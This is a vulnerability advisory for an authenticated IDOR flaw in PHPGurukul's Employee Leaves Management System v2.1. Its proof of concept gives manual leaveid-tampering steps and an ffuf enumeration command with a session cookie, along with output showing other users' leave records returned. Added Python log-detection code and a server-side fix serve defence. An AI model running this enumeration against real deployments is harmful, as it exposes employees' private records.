# Exploit Title: Employee Leaves Management System (ELMS) v2.1 - Authenticated Insecure Direct Object References (IDOR)
# Date: 2025-03-04
# Exploit Author: Mehmet Can Kadıoğlu a.k.a mao7un
# Vendor: https://phpgurukul.com/employee-leaves-management-system-elms/
# Demo Site: https://phpgurukul.com/?sdm_process_download=1&download_id=7175
# Tested on: Kali Linux
# CVE: N/A

PoC:

1. Login as an employee.
2. Go to the leaves tab; you will see your own leaves there. Clicking the "view details" button on one of your own leaves shows its details. However, you can see the leaves of any user by changing the leaveid parameter here (leaveid=11).
3. Try another leaveid: http://10.0.2.15/leave-details.php?leaveid=12
4. Read all of the leave contents of the other user.
5. Fuzzing:

###############
###############
###############
###############

➜ ~ ffuf -c -ic -w leave_ids.txt -u http://10.0.2.15/leave-details.php\?leaveid\=FUZZ -H 'Cookie: PHPSESSID=9c73627bf340b4a369310b69ba48e325' -fw 3139

[ffuf banner]
v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.0.2.15/leave-details.php?leaveid=FUZZ
 :: Wordlist         : FUZZ: /home/t00r6x0/leave_ids.txt
 :: Header           : Cookie: PHPSESSID=9c73627bf340b4a369310b69ba48e325
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response words: 3139
________________________________________________

12    [Status: 200, Size: 11186, Words: 4521, Lines: 233, Duration: 9ms]
11    [Status: 200, Size: 11177, Words: 4522, Lines: 233, Duration: 980ms]
13    [Status: 200, Size: 11148, Words: 4517, Lines: 233, Duration: 991ms]

###############
###############
###############
###############

leaveid=12 and leaveid=13 do not belong to my user.
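The fuzzing run above leaves a characteristic trace: one PHPSESSID requesting many distinct leaveid values against leave-details.php in a short burst. The following detection logic over access-log lines is an added example, not part of this advisory or of the ELMS code base; the log line layout (ip, ISO timestamp, request, status, PHPSESSID) and the threshold are assumptions.

```python
# Detect leaveid enumeration against leave-details.php in access logs (added example,
# not part of the advisory or of ELMS). Log format is an assumption:
# '<ip> <iso-timestamp> "<method> <path>" <status> PHPSESSID=<id>'.
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

LINE_RE = re.compile(r'^(?P<ip>\S+) (?P<ts>\S+) "(?P<method>[A-Z]+) (?P<path>\S+)" '
                     r'(?P<status>\d{3}) PHPSESSID=(?P<sid>\w+)$')

def parse_line(line):
    """Return (session, timestamp, leaveid) for a leave-details.php request, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["path"])
    leaveid = parse_qs(url.query).get("leaveid")
    if url.path != "/leave-details.php" or not leaveid:
        return None
    return m["sid"], datetime.fromisoformat(m["ts"]), leaveid[0]

def find_enumerators(lines, threshold=3, window=timedelta(minutes=5)):
    """Map session -> sorted distinct leaveids for sessions that requested more than
    `threshold` distinct leaveid values within `window`. An employee viewing only
    their own leaves stays low; a burst of distinct ids is the fuzzing pattern."""
    hits = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed:
            sid, ts, leaveid = parsed
            hits[sid].append((ts, leaveid))
    flagged = {}
    for sid, events in hits.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            seen = {lid for ts, lid in events[i:] if ts - start <= window}
            if len(seen) > threshold:
                flagged[sid] = sorted(seen)
                break
    return flagged

# Constructed sample log: session aaaa behaves normally, session bbbb enumerates.
SAMPLE_LOG = [
    '10.0.2.4 2025-03-04T10:00:01 "GET /leave-details.php?leaveid=11" 200 PHPSESSID=aaaa',
    '10.0.2.4 2025-03-04T10:00:09 "GET /leaves.php" 200 PHPSESSID=aaaa',
    '10.0.2.9 2025-03-04T10:05:00 "GET /leave-details.php?leaveid=10" 200 PHPSESSID=bbbb',
    '10.0.2.9 2025-03-04T10:05:00 "GET /leave-details.php?leaveid=11" 200 PHPSESSID=bbbb',
    '10.0.2.9 2025-03-04T10:05:01 "GET /leave-details.php?leaveid=12" 200 PHPSESSID=bbbb',
    '10.0.2.9 2025-03-04T10:05:02 "GET /leave-details.php?leaveid=13" 200 PHPSESSID=bbbb',
]
```

Detection only narrows the window of exposure; the root fix is for leave-details.php to scope the lookup to the logged-in employee's own records server-side and reject any leaveid that does not belong to that session.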